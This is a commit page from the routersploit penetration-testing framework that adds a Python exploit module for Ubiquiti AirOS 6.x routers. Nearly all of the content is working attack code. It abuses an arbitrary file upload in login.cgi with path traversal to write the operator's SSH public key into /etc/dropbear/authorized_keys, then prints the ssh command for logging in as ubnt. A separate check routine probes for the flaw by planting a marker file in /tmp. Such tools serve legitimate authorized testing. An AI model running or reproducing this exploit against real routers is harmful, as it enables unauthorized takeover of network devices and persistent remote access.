Skip to content

R
routersploit
Commit 682240dc by Vinicius Henrique Marangoni
Options

Added exploit module to ubiquiti AirOS 6.x

parent f2d8155b
Showing with 121 additions and 0 deletions
routersploit/modules/exploits/ubiquiti/airos_6_x.py 0 → 100644
import string, random, requests, tempfile, os.path
from routersploit import (
exploits,
print_success,
print_error,
print_info,
random_text,
sanitize_url,
http_request,
mute,
)
class Exploit(exploits.Exploit):
'''
Exploit implementation for AirOS 6.x - Arbitrary File Upload.
If the target is vulnerable is possible to take full control of the router
'''
__info__ = {
'name': 'AirOS 6.x - Arbitrary File Upload',
'description': 'Exploit implementation for AirOS 6.x - Arbitrary File Upload. If the target is vulnerable is possible to take full control of the router',
'authors': [
'93c08539', #Vulnerability discovery
'Vinicius Henrique Marangoni' #routersploit module
],
'references': [
'https://hackerone.com/reports/73480',
'https://www.exploit-db.com/exploits/39701/'
],
'targets': [
'AirOS 6.x'
]
}
target = exploits.Option('', 'Target address e.g. https://192.168.1.1') #Target address
port = exploits.Option(80, 'Target port') #Default port
#Disable certificate verification warnings
requests.packages.urllib3.disable_warnings()
def run(self):
if(self.check()):
print_success('Target is vulnerable')
print_success('Trying to exploit by uploading SSH public key')
if(os.path.isfile(os.path.expanduser('~/.ssh/id_rsa.pub'))):
upload_params = {'file': ('../../etc/dropbear/authorized_keys', open(os.path.expanduser('~/.ssh/id_rsa.pub')), {'Expect': ''})}
try:
url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
requests.post(url + 'login.cgi', files=upload_params, verify=False)
except Exception, e:
print e
print_error('Something wrong happened while uploading SSH public key')
else:
print_success('Appareantly the exploit worked fine')
print_success('Try the following command to connect to router')
ip_target = self.target.replace('https://', '')
ip_target = ip_target.replace('http://', '/')
ip_target = ip_target.replace('/', '')
print_info('ssh {0} -l ubnt' .format(ip_target))
else:
print_error('The SSH public key does not exist. You must to generate it')
else:
print_error('Target is not vulnerable')
@mute
def check(self):
url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
response = http_request(url=url + 'login.cgi', method='GET')
if(response is None):
return False #Target not vulnerable
rand_str = random_text(length=16)
tmp_payload = tempfile.TemporaryFile()
tmp_payload.write('vulnerable' + rand_str)
tmp_payload.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
try:
requests.post(url + 'login.cgi', files=upload_params, verify=False)
tmp_payload.close()
except requests.exceptions.RequestException:
tmp_payload.close()
return False #Target not vulnerable
#Response to verify if the upload was done correctly
verify_upload = http_request(url=url + 'airview.uavr', method='GET')
#Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.write('')
clean_tmp_file.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
try:
requests.post(url + 'login.cgi' .format(self.target), files=upload_params, verify=False)
clean_tmp_file.close()
except requests.exceptions.RequestException:
clean_tmp_file.close()
if('vulnerable'+rand_str in verify_upload.text):
return True
else:
return False
\ No newline at end of file
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment